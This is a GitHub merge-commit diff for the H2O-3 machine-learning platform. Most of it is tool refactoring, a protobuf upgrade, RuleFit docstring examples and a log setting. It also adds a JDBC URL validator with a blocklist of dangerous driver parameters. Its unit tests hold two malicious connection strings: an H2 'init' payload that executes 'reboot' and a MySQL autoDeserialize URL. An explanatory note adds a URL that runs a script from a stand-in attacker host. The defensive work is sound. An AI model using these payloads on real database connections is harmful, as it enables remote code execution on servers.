Commit

Merge remote-tracking branch 'origin/rel-3.46.0' into gh-15810
krasinski committed Oct 29, 2024
2 parents 2cb3105 + ac1d642 commit e919ad3
Showing 40 changed files with 1,145 additions and 388 deletions.
25 changes: 14 additions & 11 deletions h2o-algos/src/main/java/water/tools/MojoConvertTool.java
@@ -33,25 +33,28 @@ void convert() throws IOException {
Files.write(pojoPath, pojo.getBytes(StandardCharsets.UTF_8));
}

- private static void usage() {
-   System.err.println("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java");
- }
-
public static void main(String[] args) throws IOException {
- if (args.length < 2) {
-   usage();
+ try {
+   mainInternal(args);
+ }
+ catch (IllegalArgumentException e) {
+   System.err.println(e.getMessage());
+   System.exit(1);
+ }
}

+ public static void mainInternal(String[] args) throws IOException {
+   if (args.length < 2 || args[0] == null || args[1] == null) {
+     throw new IllegalArgumentException("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java");
+   }

File mojoFile = new File(args[0]);
- if (!mojoFile.isFile()) {
-   System.err.println("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!");
-   System.exit(2);
+ if (!mojoFile.exists() || !mojoFile.isFile()) {
+   throw new IllegalArgumentException("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!");
}
File pojoFile = new File(args[1]);
if (pojoFile.isDirectory() || (pojoFile.getParentFile() != null && !pojoFile.getParentFile().isDirectory())) {
-   System.err.println("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory.");
-   System.exit(3);
+   throw new IllegalArgumentException("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory.");
}

System.out.println();
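Note: the change above splits the command-line entry point. main() now only prints the message of an IllegalArgumentException and exits with code 1, while mainInternal() performs the argument and file checks and throws instead of calling System.exit, so the conversion can also be driven in-process (see the reflective tool runner further below). A minimal in-process sketch, not part of this commit, assuming h2o.jar is on the classpath and using placeholder file names:

// Sketch only: reuse the tool in-process instead of relying on exit codes.
import water.tools.MojoConvertTool;

public class ConvertMojoExample {
  public static void main(String[] args) throws java.io.IOException {
    try {
      // Equivalent to: java -cp h2o.jar water.tools.MojoConvertTool source_mojo.zip target_pojo.java
      MojoConvertTool.mainInternal(new String[]{"source_mojo.zip", "target_pojo.java"});
    } catch (IllegalArgumentException e) {
      // Bad arguments and missing files now surface as exceptions rather than exit codes 2/3.
      System.err.println(e.getMessage());
    }
  }
}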
2 changes: 1 addition & 1 deletion h2o-assemblies/main/build.gradle
@@ -52,7 +52,7 @@ dependencies {

// Upgrade dependencies coming from Hadoop to address vulnerabilities
api "org.apache.commons:commons-compress:1.26.0"
- api "com.google.protobuf:protobuf-java:3.21.7"
+ api "com.google.protobuf:protobuf-java:3.25.5"

constraints {
api('com.fasterxml.jackson.core:jackson-databind:2.17.2') {
158 changes: 157 additions & 1 deletion h2o-bindings/bin/custom/python/gen_rulefit.py
@@ -6,6 +6,21 @@ def rule_importance(self):
Retrieve rule importances for a Rulefit model
:return: H2OTwoDimTable
:examples:
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> rule_importance = rfit.rule_importance()
>>> print(rfit.rule_importance())
"""
if self._model_json["algo"] != "rulefit":
raise H2OValueError("This function is available for Rulefit models only")
@@ -18,11 +18,33 @@ def rule_importance(self):

def predict_rules(self, frame, rule_ids):
"""
Evaluates validity of the given rules on the given data.
:param frame: H2OFrame on which rule validity is to be evaluated
:param rule_ids: string array of rule ids to be evaluated against the frame
:return: H2OFrame with one column per input rule id; each value is a flag indicating whether the given rule applies to the observation.
:examples:
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv"
>>> df = h2o.import_file(path=f, col_types={'species': "enum"})
>>> x = df.columns
>>> y = "species"
>>> x.remove(y)
>>> train, test = df.split_frame(ratios=[.8], seed=1234)
>>> rfit = H2ORuleFitEstimator(min_rule_length=4,
... max_rule_length=5,
... max_num_rules=3,
... seed=1234,
... model_type="rules")
>>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test)
>>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica']))
"""
from h2o.frame import H2OFrame
from h2o.utils.typechecks import assert_is_type
@@ -52,3 +85,126 @@ def predict_rules(self, frame, rule_ids):
"""
),
)

examples = dict(
algorithm="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... algorithm="gbm",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_categorical_levels="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... max_categorical_levels=11,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_num_rules="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=3,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
min_rule_length="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... min_rule_length=4,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
max_rule_length="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... min_rule_length=3,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
model_type="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... model_type="rules",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
distribution="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... distribution="bernoulli",
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
""",
rule_generation_ntrees="""
>>> import h2o
>>> h2o.init()
>>> from h2o.estimators import H2ORuleFitEstimator
>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv"
>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"})
>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"]
>>> y = "survived"
>>> rfit = H2ORuleFitEstimator(max_rule_length=10,
... max_num_rules=100,
... rule_generation_ntrees=60,
... seed=1)
>>> rfit.train(training_frame=df, x=x, y=y)
>>> print(rfit.rule_importance())
"""
)
45 changes: 45 additions & 0 deletions h2o-core/src/main/java/water/jdbc/SQLManager.java
@@ -5,10 +5,20 @@
import water.parser.ParseDataset;
import water.util.Log;

import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.sql.*;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.atomic.AtomicLong;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

public class SQLManager {

Expand All @@ -30,6 +40,15 @@ public class SQLManager {

private static final String TMP_TABLE_ENABLED = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.tmp_table.enabled";

private static final String DISALLOWED_JDBC_PARAMETERS_PARAM = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.jdbc.disallowed.parameters";

private static final Pattern JDBC_PARAMETERS_REGEX_PATTERN = Pattern.compile("(?i)[?;&]([a-z]+)=");

private static final List<String> DEFAULT_JDBC_DISALLOWED_PARAMETERS = Stream.of(
"autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql
"allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql
"init", "script", "shutdown" //h2
).map(String::toLowerCase).collect(Collectors.toList());
private static AtomicLong NEXT_TABLE_NUM = new AtomicLong(0);

static Key<Frame> nextTableKey(String prefix, String postfix) {
@@ -58,6 +77,7 @@ public static Job<Frame> importSqlTable(
final String username, final String password, final String columns,
final Boolean useTempTable, final String tempTableName,
final SqlFetchMode fetchMode, final Integer numChunksHint) {
validateJdbcUrl(connection_url);

final Key<Frame> destination_key = nextTableKey(table, "sql_to_hex");
final Job<Frame> j = new Job<>(destination_key, Frame.class.getName(), "Import SQL Table");
@@ -533,6 +553,7 @@ private static int estimateConcurrentConnections(final int cloudSize, final shor
* @throws SQLException if a database access error occurs or the url is
*/
public static Connection getConnectionSafe(String url, String username, String password) throws SQLException {
validateJdbcUrl(url);
initializeDatabaseDriver(getDatabaseType(url));
try {
return DriverManager.getConnection(url, username, password);
@@ -588,6 +609,30 @@ static void initializeDatabaseDriver(String databaseType) {
}
}

public static void validateJdbcUrl(String jdbcUrl) throws IllegalArgumentException {
if (jdbcUrl == null || jdbcUrl.trim().isEmpty()) {
throw new IllegalArgumentException("JDBC URL is null or empty");
}

if (!jdbcUrl.toLowerCase().startsWith("jdbc:")) {
throw new IllegalArgumentException("JDBC URL must start with 'jdbc:'");
}

Matcher matcher = JDBC_PARAMETERS_REGEX_PATTERN.matcher(jdbcUrl);
String property = System.getProperty(DISALLOWED_JDBC_PARAMETERS_PARAM);
List<String> disallowedParameters = property == null ?
DEFAULT_JDBC_DISALLOWED_PARAMETERS :
Arrays.stream(property.split(",")).map(String::toLowerCase).collect(Collectors.toList());

while (matcher.find()) {
String key = matcher.group(1);
if (disallowedParameters.contains(key.toLowerCase())) {
throw new IllegalArgumentException("Potentially dangerous JDBC parameter found: " + key +
        ". This behavior can be changed by setting the " + DISALLOWED_JDBC_PARAMETERS_PARAM + " system property to a different comma-separated list.");
}
}
}

static class SqlTableToH2OFrameStreaming {
final String _table, _columns, _databaseType;
final int _numCol;
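Note: validateJdbcUrl rejects connection strings that carry driver parameters known to enable code execution or local file access (autoDeserialize, allowLoadLocalInfile and friends for MySQL; init, script, shutdown for H2). The blocklist can be replaced through the system property named by DISALLOWED_JDBC_PARAMETERS_PARAM; the "sys.ai.h2o." prefix used below is an assumption, inferred from the log.max.pid.length comment in Log.java further down. A sketch of exercising the validation, not part of this commit:

// Sketch only: calling SQLManager.validateJdbcUrl and overriding the default blocklist.
import water.jdbc.SQLManager;

public class JdbcUrlValidationExample {
  public static void main(String[] args) {
    // A plain URL with no driver parameters passes validation.
    SQLManager.validateJdbcUrl("jdbc:postgresql://db-host:5432/sales");

    // Optionally replace the default blocklist with a custom comma-separated list
    // (property name assumed to resolve to the sys.ai.h2o. prefix).
    System.setProperty("sys.ai.h2o.sql.jdbc.disallowed.parameters", "allowloadlocalinfile,init");

    try {
      SQLManager.validateJdbcUrl("jdbc:h2:mem:test;init=RUNSCRIPT FROM 'http://attacker/x.sql'");
    } catch (IllegalArgumentException e) {
      System.err.println(e.getMessage()); // names the offending parameter ("init")
    }
  }
}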
@@ -33,10 +33,12 @@ public ValStr apply(Env env, Env.StackHelp stk, AstRoot[] asts) {
try {
// only allow to run approved tools (from our package), not just anything on classpath
Class<?> clazz = Class.forName(TOOLS_PACKAGE + toolClassName);
- Method mainMethod = clazz.getDeclaredMethod("main", String[].class);
+ Method mainMethod = clazz.getDeclaredMethod("mainInternal", String[].class);
mainMethod.invoke(null, new Object[]{args});
} catch (Exception e) {
- throw new RuntimeException(e);
+ RuntimeException shorterException = new RuntimeException(e.getCause().getMessage());
+ shorterException.setStackTrace(new StackTraceElement[0]);
+ throw shorterException;
}
return new ValStr("OK");
}
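Note: this hunk switches the reflective tool runner from the tools' main() to the new mainInternal() methods, so an invalid argument raises an exception inside the calling JVM instead of a System.exit, and the runner re-throws only the cause's message with an empty stack trace to keep the client-facing error short. The e.getCause() call works because Method.invoke wraps anything thrown by the target in an InvocationTargetException; a standalone sketch of that mechanism, not H2O code:

// Sketch only: why the runner reads e.getCause() -- reflection wraps the tool's exception.
import java.lang.reflect.Method;

public class ReflectionUnwrapDemo {
  public static void mainInternal(String[] args) {
    throw new IllegalArgumentException("usage: tool <in> <out>");
  }

  public static void main(String[] args) throws Exception {
    Method m = ReflectionUnwrapDemo.class.getDeclaredMethod("mainInternal", String[].class);
    try {
      m.invoke(null, new Object[]{new String[0]});
    } catch (Exception e) {
      // e is an InvocationTargetException; the tool's message sits on the cause.
      RuntimeException shorter = new RuntimeException(e.getCause().getMessage());
      shorter.setStackTrace(new StackTraceElement[0]); // keep the reported error short
      throw shorter;
    }
  }
}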
3 changes: 3 additions & 0 deletions h2o-core/src/main/java/water/tools/EncryptionTool.java
@@ -47,6 +47,9 @@ public void encrypt(File input, File output) throws IOException, GeneralSecurity
}

public static void main(String[] args) throws GeneralSecurityException, IOException {
mainInternal(args);
}
public static void mainInternal(String[] args) throws GeneralSecurityException, IOException {
EncryptionTool et = new EncryptionTool();
et._keystore_file = new File(args[0]);
et._keystore_type = args[1];
12 changes: 10 additions & 2 deletions h2o-core/src/main/java/water/util/Log.java
@@ -29,8 +29,8 @@ abstract public class Log {
public static final byte INFO = 3;
public static final byte DEBUG= 4;
public static final byte TRACE= 5;

public static final String[] LVLS = { "FATAL", "ERRR", "WARN", "INFO", "DEBUG", "TRACE" };
private static final String PROP_MAX_PID_LENGTH = H2O.OptArgs.SYSTEM_PROP_PREFIX + "log.max.pid.length";

private static int _level = INFO;
private static boolean _quiet = false;
@@ -262,7 +262,15 @@ public static String getLogFilePath(String level) {

private static String getHostPortPid() {
String host = H2O.SELF_ADDRESS.getHostAddress();
- return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", 6);
+ return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", maximumPidLength() + 2);
}

// set sys.ai.h2o.log.max.pid.length to avoid h2o-3 trimming PID in the logs
private static int maximumPidLength() {
String maxPidPropertyValue = System.getProperty(PROP_MAX_PID_LENGTH);
return maxPidPropertyValue != null
? Integer.parseInt(maxPidPropertyValue)
: 4;
}

private static synchronized Logger createLog4j() {
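Note: the log-line prefix previously reserved a fixed width of 6 characters for the PID plus its trailing space, which trims longer PIDs (for example the 7-digit PIDs common on modern Linux). The default stays the same (maximumPidLength() returns 4, plus 2), and the sys.ai.h2o.log.max.pid.length property widens it. A sketch of opting in before H2O starts, not part of this commit; passing the value as a -D JVM flag is assumed to be equivalent:

// Sketch only: widen the PID column so 7-digit PIDs are not trimmed in the logs.
// Equivalent to launching the JVM with -Dsys.ai.h2o.log.max.pid.length=7.
public class WidePidLogging {
  public static void main(String[] args) {
    System.setProperty("sys.ai.h2o.log.max.pid.length", "7");
    // start or embed H2O afterwards, e.g. water.H2OApp.main(args) -- assumed entry point
  }
}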
20 changes: 20 additions & 0 deletions h2o-core/src/test/java/water/jdbc/SQLManagerTest.java
@@ -145,4 +145,24 @@ public void testBuildSelectChunkSql() {
Assert.assertEquals("SELECT * FROM mytable LIMIT 1310 OFFSET 0",
SQLManager.buildSelectChunkSql("", "mytable", 0, 1310, "*", null));
}

@Test
public void testValidateJdbcConnectionStringH2() {
exception.expect(IllegalArgumentException.class);
exception.expectMessage("Potentially dangerous JDBC parameter found: init");

String h2MaliciousJdbc = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS RBT AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"reboot\")" + "})" + "def rbt" + "'";

SQLManager.validateJdbcUrl(h2MaliciousJdbc);
}

@Test
public void testValidateJdbcConnectionStringMysql() {
exception.expect(IllegalArgumentException.class);
exception.expectMessage("Potentially dangerous JDBC parameter found: autoDeserialize");

String mysqlMaliciousJdbc = "jdbc:mysql://domain:123/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=abcd";

SQLManager.validateJdbcUrl(mysqlMaliciousJdbc);
}
}
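The two new tests cover only rejected URLs; a hypothetical companion test, not part of this commit, could assert that benign connection strings still pass, dropped into the same SQLManagerTest class:

// Hypothetical companion test, not in this commit: benign URLs must not throw.
@Test
public void testValidateJdbcConnectionStringBenign() {
  // no driver parameters at all
  SQLManager.validateJdbcUrl("jdbc:postgresql://db-host:5432/sales");
  // parameters that are not on the blocklist are allowed
  SQLManager.validateJdbcUrl("jdbc:mysql://db-host:3306/test?useSSL=true&user=abcd");
}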